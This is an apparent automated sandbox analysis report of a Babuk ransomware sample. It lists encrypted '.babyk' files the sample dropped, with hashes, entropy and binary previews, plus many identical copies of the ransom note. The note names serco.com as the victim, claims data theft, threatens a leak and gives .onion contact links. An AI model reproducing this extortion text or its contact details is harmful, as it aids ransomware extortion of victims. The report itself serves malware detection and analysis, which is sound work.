                                                                            Preview: ...0 %.......q_S......C/.Y..L..Ob...S...w~(AG..V=.R.z...RM.........B>....ys.Y;. .>....7.......g...k......{2..7........A...r....\...S..h.y.Lt....0.l......q.v4T....Re%.....s~KI...3..9#..}a(..E!A^....t...-..,FC$..I.&....fzHJ..Y%...UOX.".4s...@..PC.w.z....s..$B.(.....MUQ.....(..t...V.[c..!U*.2P..n..2M..p..Z...Fd......m......9.-I..*.m...(.....+...os..=6A|.`..G..K<pO.d.5....Z,;.'-..e.E.Y@hy,G..Rv2.......#.k....E..7...S.3.....b.L..J....j.F.C.\O.......C.......f..zS=....Y....)..F....jv..K}..|...O.../.~q....W...>.....1..p95....i..c..C.....NF(.\9...g8..|0_x..T...W.....r.-H.M"*5._]z.e&...l..dG^..>..J..^..._*2.KH..Pw'.;..!.....;Zgh..:.}7..r.c^x....;.JK,..............RYC.5XG.e0...._Qyq...>x........qP...B...k....I.9}....c..<..f...n.$.Z.n..z...U..g;q...mw.N....6...\9..h.e|..L...5.R....w.>z{.I..dS.i..fW...(.P.... .^jA....S....\..D\.j}..G..T.....M(............+.s...#.u...IV..c3OO.5..}.^..45s..ZF...S..m.h.P/=}.%Z........` .s;=.H..]...+."vd......b.......8
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):5971
                                                                            Entropy (8bit):7.969091391979781
                                                                            Encrypted:false
                                                                            SSDEEP:96:8nlBzdExzF2+AEsUWAaTF4b/GdG1kc6svTt4Ie+U/PpjTZTYK1VbCd/GQgZ63FM5:UlBmpFR04QGiFsvJq/Qyle51N9i
                                                                            MD5:652D1A90718F7DD7FB09EFE305A75FD4
                                                                            SHA1:30D2FA4C0F643DB6E285ACE77DA5C88E4B6AC827
                                                                            SHA-256:EFFB9F74A63B6801C6518988CDAA34D377CDD943E7B9B188C4C5141508CA929E
                                                                            SHA-512:B033FA2C992322A14E9F384A7CEDA40337635D499EF40E95436B6BB7D1FD30A9E47B0D797271F7BA99AB7627CB655956ABB8F48D39CFB5ACCA65920B5345E29F
                                                                            Malicious:false
                                                                            Preview: W..(z.0......y.....$.e...P@.%..*s+)]..CtM6.GJ.....o...I.x.O.Vu..7.V.{ks.N..(\..i.J......I.6......$..0.j....{.+.r.i......#....7.qf..:...L..C..c..._.4.....$2...f.L-..`..Z./N'.2...x.<..>..Lh.O.?.6.|...#..4..~_.".;'.v..f..z..4..|.1O..:.j...H..k0...E..s.1.,J@.WI..N.n..1.-..l...s.[EQ3.T..7S.....(.0......Y.......g..... .C.?v7..+.fH;.4..R..;..i#w..]...}...v...|.......~......1m..3.....5+.=.U..4..#....88.W.d..\.U,6c9O.@J...m@..Br.y.O.7.Fm.P..Q.+(Oc....4......"0...k...D...._....N.h..I._......?Z.......5'D....."ip...!...sg........s..l,L...'.:F.3....5@2.4#..w.).>O..LOG^..........!{Zz.a...s..<H.n..X........:W..CXy..V9.F.....} .&...x..)......N:..=F.wF..d.h..K..p}.....*.x.>....]v.o./.Uc ..pzw....\.....K9.M.....q...\]g7..w.x@wfw...8))~.N.H.nl .b...$.A.c..*.y:&.k.._....-+.Ie....ib...F..=..jw....+w.W.+.B......`..A.....Up...z..>k.5,tR..@.n4...mAp.L.ZZ.....E~../H..L#.Q.....[..)z..(.b.4.........S...}....$k.1....b/.a],.._.....#+./._...3...=3...a.E..e...Q...G
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\ngen.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):501
                                                                            Entropy (8bit):7.5304874982917775
                                                                            Encrypted:false
                                                                            SSDEEP:6:EHrLWGmIOac7/DZaxOrpUT0SPQ6T39VC5pE0Bueu9bRUc0imD1Y3WbvOibnL0vtn:ELCF6QSOrU0SPQ6TCELNbd0x23WbO
                                                                            MD5:F4F5805B97395628A648F5D68FD824BB
                                                                            SHA1:39131D9211E0C768855DC3657470B3A84A971276
                                                                            SHA-256:849B707EC426C0616FA38038882CB9A4AD7472E6F9A0868367A013354EC107F2
                                                                            SHA-512:714492F52680AEC0F6E1C20B6279EF18D4EA6047FED1DAEAD49493E8CE1B5E828A4E473B443EB7EE483DF2AC395526885FEECA24C95795DA7F7F07E80EA21884
                                                                            Malicious:false
                                                                            Preview: .&*<.(~Q..{.g....xp..+.e...=a......=...(.".C..9..Eg...$./.cNWa7...w.:.B...M.f...+.1&.-..?7[)i....x.c..~....`...l~oV.!v....#._...a...v.8=....s)Fwh.....r...fX...+..-.6.A!..N/;.T..\qa..v.Y7.b7..YI....:..D.(.......P.D..JH4....b-.0.x.{jj...`.g;..2.va=..G.../.z......s{.....5.FD..s.a....^+...1.7.4z...,M^...........b......=.T33o....m].r...H(..2G.qL.{a..-..... /u...0...{.N.../$.Q5...k...'.?..Qe..^n|2.M..!7g..E..sPF..i...!.Q..(v..\.=-.A.......t`.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2311
                                                                            Entropy (8bit):7.90864981130882
                                                                            Encrypted:false
                                                                            SSDEEP:48:PjLvfXBk4Nmew2c9/L//WssCY8pZCGd3NV75Fl5Q2tYXcs30N9dhD0p/t/q:XBk2z4xLnWssJ8pZCQ3N/Ogh9dhD0p/s
                                                                            MD5:ED456F3DDBC59D552294564903D87972
                                                                            SHA1:E92E3A5BB1B7C866E97C7BFFC80D7E99CFF7AE39
                                                                            SHA-256:3CDBC8A8E87814B8DD62353319F390D14587D0C02E613E19F373ABF8BB634853
                                                                            SHA-512:1C38C643D8CAC35A693E04DED28A2BA437027A6361A6169C7523A103EE39360CA3FD66911D493F0C7AFB2DE5F79CE1D3742EA75E598D120541645B71BE4667DE
                                                                            Malicious:false
                                                                            Preview: ...}.....B..`;..G...".g.....>.....<.Pk@^.g.......s_6..E...(.9..L....8.....zY.G.2.3.Qb....N8..oP)40.....K..H.].6.%..6Cc.A...;.....@.^.:.HL.N....[.^_...k...e....m..k@...../.8..|.G........&E...q....~=....|.`...?........8..r.H...1..Y.Oq]...AMsH....B.H..u......59...0Yr..u...S.z....]hP..U<E.y[..1.p.U.......CW]...Q..E....,.(.,..{.....1.....@..)..I.3.Y."/)..H~......m..0r...>.W..T~..N1..<....iM...S1.8.....-..(./.,..>H.[6...w.e..n.H..Y 1X.|w..C...o.U.......bu..&.".g.,.......}....d.)...(._.;.=..v........0w.N....b.B..DXp.O..7.@i... .....r....G...}G....iU.f.L..(2....."raW.|.....Y1...'Y.Od..^...of......1....I..?.zv+...m....r.Y..Qu.j.XN5.....3t;.m*...f.......cA...^@..;..N.......O.a...c...?...l....RO....).<..wh..-..2...~........@..u=.$.....U..9...z..K../....cIp}..,`...=...G.k..-...i)..9.B..H.l.........W[......p3g...V.............6....k|K.6.<.L...,M........~..g.s.).I...j[. .`..xe|...f..,8.....Te.h......8.......x.I.(L.........o..%.........
                                                                            C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):11128
                                                                            Entropy (8bit):7.9839994320727214
                                                                            Encrypted:false
                                                                            SSDEEP:192:7ox80taAeEh3S1/4c7GBH2j64oY/GKtLpL2/rVQJAMz+fidFD40brStlfgmMxEW6:GXA1rGBHA64TGKRpqjV0Xzco940/Szy8
                                                                            MD5:A17B7334F0DB153F0E8BD64440C8D267
                                                                            SHA1:621F5A73E16DFF53CFF9D70D782326A4237402AD
                                                                            SHA-256:2A42561D51A43970B337F7A9275F72F57B9DAE1A68F613D731F7826C6250531C
                                                                            SHA-512:9851669A45BA3A1AAA495C55A51BCC53855F39CA2D894BC9CE060A4C632D4770DAD8FDE9620D6AE46BF97034904E334B69131E2839201386D467FF0372BED8C3
                                                                            Malicious:false
                                                                            Preview: v..._.K|7$k.O..W....&.H.....?....j<^Z...m.1.>^.......ic.=Ep1v.1!........F..(/.Y.D.{.+^....g...L.....+6.Q.zbX...d.7.W..-...C.U.b.....q..p....^.[.(..#Q.e,W[..A|...g.....<d....+1..~ ...Z.........n..uh*M6.$r0.....O.a......;r...Y.....%..O.X.P.[J.4...]z...V'.0..9.tG*.f..c....(B...G.w..R;.jf..C.\.D.Ba..W.b..i...N......=|...W.Y...c...C.D.&5'..J..K.>.2K.mC4..cPy<...6.^.(..3!8.g(3.4+l...l.........e.....B..YOvSH..N..........O..p..f+.....S3ay.R.....4....:...1R.T.)....#.....@.[U.O!...{~.H+!Xs.".;.T...U.R.`.{........;k..K""*7:8....6.<.3*}...B..[..l+.....3....X .u......h^T.'h.[">...Y.y:B....7B.S.c+'..K..7....w..8W..M..z@P..'..........^....Fe*.;h2"'.G.....&.!...W.z.6F#..3..V...]O.P...s...._D..lj........P...t.'....!9"...(.......)\.a.$|.,F....2.aM.X.AS)....s.+K...R2>....n...^.+9(G.!.#..d:O.QI.D.*..h.E..`i(..H.....J.H......Y....G1..v..k....D\['...9..v4Ff...`.7a......-!.3.....m..D..+4o[?..Z=V....i...<.^....6.^.R.Nz.cVRo.]Mp.....2..O5.+}3
                                                                            C:\Users\user\AppData\Local\Microsoft\Credentials\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Feeds Cache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Feeds\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\GameDVR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\InputPersonalization\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\01_Music_auto_rated_at_5_stars.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1212
                                                                            Entropy (8bit):7.839325018591277
                                                                            Encrypted:false
                                                                            SSDEEP:24:yGzR7fx+HloTOCY/rfZmtgFAQ7rT71nW6nQYont/:yGx5kPCY/ggFB46Qznt/
                                                                            MD5:94A8AAE8C42A0BFB92E6A0C57F5CB86E
                                                                            SHA1:F8FAB19384338FF20A39FD70C945F0F33E63666C
                                                                            SHA-256:A1B8B223111D92611B5EDEA6C843AEDEDD3169E97876553DFAA96EE0D1169717
                                                                            SHA-512:34D9DFF382E9F8AF654D76454F490B23B73AD46AE4B9D459B3C19629803040E5EC62DC3F130CA549B4E13602107FC506590EEA8A93F658CAAAC1779D7902B92F
                                                                            Malicious:false
